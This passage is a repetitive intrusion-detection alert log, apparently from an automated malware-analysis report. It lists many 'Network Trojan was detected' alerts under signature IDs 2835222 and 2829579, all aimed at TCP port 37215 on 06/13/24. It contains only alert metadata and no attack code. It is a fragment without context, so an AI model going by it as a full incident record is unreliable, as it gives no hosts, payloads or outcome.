              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045500
              SID:2835222
              Source Port:49664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459991
              SID:2835222
              Source Port:57698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124746
              SID:2829579
              Source Port:33984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832833
              SID:2829579
              Source Port:38692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669123
              SID:2829579
              Source Port:42442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678950
              SID:2835222
              Source Port:40820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229829
              SID:2835222
              Source Port:40660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436706
              SID:2829579
              Source Port:43464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.115781
              SID:2829579
              Source Port:44846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888974
              SID:2829579
              Source Port:47862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279007
              SID:2835222
              Source Port:53476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503562
              SID:2835222
              Source Port:43754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633237
              SID:2829579
              Source Port:48876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.630904
              SID:2829579
              Source Port:39874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543408
              SID:2829579
              Source Port:47040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155350
              SID:2835222
              Source Port:33690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823970
              SID:2835222
              Source Port:44836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993148
              SID:2835222
              Source Port:54454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752863
              SID:2835222
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213880
              SID:2829579
              Source Port:59596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726189
              SID:2835222
              Source Port:37442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632837
              SID:2835222
              Source Port:34252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991834
              SID:2835222
              Source Port:53550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372640
              SID:2829579
              Source Port:43514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177577
              SID:2835222
              Source Port:54750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253798
              SID:2829579
              Source Port:46420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158825
              SID:2835222
              Source Port:59780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307438
              SID:2829579
              Source Port:53422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.990655
              SID:2829579
              Source Port:38136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913599
              SID:2829579
              Source Port:53814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453233
              SID:2829579
              Source Port:40772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132950
              SID:2835222
              Source Port:38776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090364
              SID:2829579
              Source Port:41184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913261
              SID:2829579
              Source Port:52966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224632
              SID:2829579
              Source Port:58792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.059688
              SID:2829579
              Source Port:55646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106884
              SID:2829579
              Source Port:50606
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784995
              SID:2835222
              Source Port:47560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306609
              SID:2835222
              Source Port:41470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680409
              SID:2829579
              Source Port:49392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060795
              SID:2829579
              Source Port:37118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276925
              SID:2835222
              Source Port:60912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407798
              SID:2829579
              Source Port:39894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452773
              SID:2835222
              Source Port:49214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176893
              SID:2829579
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969681
              SID:2835222
              Source Port:43546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728053
              SID:2829579
              Source Port:40266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302676
              SID:2835222
              Source Port:34524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730772
              SID:2835222
              Source Port:48738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246701
              SID:2829579
              Source Port:32922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710068
              SID:2835222
              Source Port:42550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169662
              SID:2829579
              Source Port:43240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725088
              SID:2829579
              Source Port:43982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013175
              SID:2835222
              Source Port:38002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555553
              SID:2835222
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785485
              SID:2829579
              Source Port:58668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604605
              SID:2829579
              Source Port:45588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908265
              SID:2835222
              Source Port:39244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632422
              SID:2835222
              Source Port:33052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027815
              SID:2829579
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456128
              SID:2829579
              Source Port:41892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507706
              SID:2835222
              Source Port:59984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756018
              SID:2829579
              Source Port:37248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349934
              SID:2829579
              Source Port:60974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886248
              SID:2829579
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913077
              SID:2829579
              Source Port:49130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176911
              SID:2829579
              Source Port:43652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130443
              SID:2835222
              Source Port:55354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.127919
              SID:2829579
              Source Port:44218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091397
              SID:2829579
              Source Port:34040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.132332
              SID:2835222
              Source Port:60894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091128
              SID:2835222
              Source Port:45156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488340
              SID:2835222
              Source Port:34178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679907
              SID:2829579
              Source Port:38458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555411
              SID:2829579
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708302
              SID:2835222
              Source Port:58058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.130292
              SID:2829579
              Source Port:49250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155252
              SID:2835222
              Source Port:43328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014054
              SID:2829579
              Source Port:41646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.631835
              SID:2829579
              Source Port:37400
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.452784
              SID:2829579
              Source Port:50980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192518
              SID:2829579
              Source Port:44704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568475
              SID:2829579
              Source Port:41038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.750587
              SID:2835222
              Source Port:50086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821884
              SID:2835222
              Source Port:43280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604307
              SID:2835222
              Source Port:59410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936491
              SID:2829579
              Source Port:54998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.057369
              SID:2829579
              Source Port:38186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317392
              SID:2829579
              Source Port:41194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211780
              SID:2835222
              Source Port:41696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404343
              SID:2835222
              Source Port:48424
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.478666
              SID:2829579
              Source Port:54540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300488
              SID:2829579
              Source Port:35032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785953
              SID:2829579
              Source Port:53394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402922
              SID:2829579
              Source Port:44394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.884297
              SID:2835222
              Source Port:59374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098575
              SID:2835222
              Source Port:55152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252792
              SID:2835222
              Source Port:58500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.753844
              SID:2829579
              Source Port:55504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.401716
              SID:2829579
              Source Port:54080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224141
              SID:2835222
              Source Port:53364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546566
              SID:2835222
              Source Port:54384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941525
              SID:2829579
              Source Port:52028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340220
              SID:2835222
              Source Port:39820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099035
              SID:2835222
              Source Port:54504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488118
              SID:2829579
              Source Port:42122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403247
              SID:2835222
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096606
              SID:2829579
              Source Port:38382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613466
              SID:2829579
              Source Port:45186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213577
              SID:2835222
              Source Port:49352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.264488
              SID:2835222
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839525
              SID:2829579
              Source Port:39866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758806
              SID:2835222
              Source Port:48474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109515
              SID:2829579
              Source Port:44236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038109
              SID:2829579
              Source Port:45370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671150
              SID:2829579
              Source Port:51448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060748
              SID:2835222
              Source Port:39078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477580
              SID:2829579
              Source Port:41338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417124
              SID:2835222
              Source Port:44804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696498
              SID:2835222
              Source Port:52282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607071
              SID:2835222
              Source Port:40304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405048
              SID:2829579
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551461
              SID:2829579
              Source Port:56484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568246
              SID:2829579
              Source Port:39512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727269
              SID:2829579
              Source Port:50686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970762
              SID:2835222
              Source Port:37514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087500
              SID:2829579
              Source Port:47032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177430
              SID:2835222
              Source Port:37692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323344
              SID:2829579
              Source Port:43480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.781920
              SID:2829579
              Source Port:47128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048367
              SID:2829579
              Source Port:55418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093868
              SID:2835222
              Source Port:49322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.868732
              SID:2835222
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731639
              SID:2835222
              Source Port:49278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942909
              SID:2835222
              Source Port:45712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708673
              SID:2835222
              Source Port:36498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669071
              SID:2829579
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.486585
              SID:2835222
              Source Port:41984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.609923
              SID:2835222
              Source Port:33972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.782804
              SID:2835222
              Source Port:44768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.423421
              SID:2829579
              Source Port:57528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.197711
              SID:2835222
              Source Port:36192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323651
              SID:2829579
              Source Port:33152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.843955
              SID:2829579
              Source Port:53268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016010
              SID:2835222
              Source Port:37344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419690
              SID:2835222
              Source Port:46862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458671
              SID:2829579
              Source Port:42498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474066
              SID:2835222
              Source Port:51506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262473
              SID:2835222
              Source Port:52498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543702
              SID:2835222
              Source Port:49976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252016
              SID:2829579
              Source Port:56884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506293
              SID:2835222
              Source Port:36256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298738
              SID:2835222
              Source Port:38086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635987
              SID:2835222
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454507
              SID:2835222
              Source Port:55378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310393
              SID:2829579
              Source Port:52208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.636123
              SID:2829579
              Source Port:59506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756387
              SID:2835222
              Source Port:37854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318412
              SID:2835222
              Source Port:53772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474862
              SID:2829579
              Source Port:36040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076788
              SID:2835222
              Source Port:35916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659040
              SID:2829579
              Source Port:38256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758894
              SID:2835222
              Source Port:45250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416394
              SID:2835222
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674420
              SID:2829579
              Source Port:49558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757086
              SID:2835222
              Source Port:51720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093671
              SID:2829579
              Source Port:50398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167543
              SID:2835222
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547165
              SID:2835222
              Source Port:56902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803612
              SID:2829579
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224689
              SID:2835222
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254806
              SID:2829579
              Source Port:53704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154245
              SID:2835222
              Source Port:33566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089894
              SID:2835222
              Source Port:56528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376711
              SID:2835222
              Source Port:49338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039171
              SID:2835222
              Source Port:36706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346374
              SID:2835222
              Source Port:52072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656490
              SID:2835222
              Source Port:47980
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680528
              SID:2835222
              Source Port:42058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.969269
              SID:2829579
              Source Port:36634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241236
              SID:2829579
              Source Port:57864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710834
              SID:2829579
              Source Port:51410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987800
              SID:2829579
              Source Port:57156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460196
              SID:2829579
              Source Port:53468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731303
              SID:2829579
              Source Port:53838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078983
              SID:2835222
              Source Port:58676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.379186
              SID:2835222
              Source Port:36732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231662
              SID:2829579
              Source Port:39926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.501687
              SID:2835222
              Source Port:52370
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106042
              SID:2835222
              Source Port:38190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193348
              SID:2835222
              Source Port:35542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270910
              SID:2829579
              Source Port:53442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871007
              SID:2829579
              Source Port:33868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272899
              SID:2835222
              Source Port:32942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756444
              SID:2829579
              Source Port:52812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437227
              SID:2835222
              Source Port:59702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889402
              SID:2835222
              Source Port:59782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
